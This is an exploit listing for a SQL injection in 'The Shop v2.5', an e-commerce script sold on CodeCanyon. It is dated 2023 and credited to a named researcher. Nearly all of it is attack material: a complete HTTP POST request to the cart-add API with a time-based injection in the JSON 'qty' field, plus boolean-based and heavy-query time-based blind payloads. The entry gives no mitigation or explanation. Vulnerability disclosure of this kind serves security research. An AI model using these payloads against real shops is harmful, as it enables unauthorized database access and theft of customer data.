The Shop 2.5 SQL Injection

# Exploit Title: The Shop v2.5 - SQL Injection# Date: 2023-06-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/the-shop/34858541# Demo Site: https://shop.activeitzone.com# Tested on: Kali Linux# CVE: N/A### Request ###POST /api/v1/carts/add HTTP/1.1Content-Type: application/jsonAccept: application/json, text/plain, */*x-requested-with: XMLHttpRequestx-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4Referer: https://localhostCookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL;the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7Content-Length: 81Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}### Parameter & Payloads ###Parameter: JSON qty ((custom) POST)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420)THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495)END))","temp_user_id":null}    Type: time-based blind    Title: MySQL > 5.0.12 OR time-based blind (heavy query)    Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNSC)","temp_user_id":null}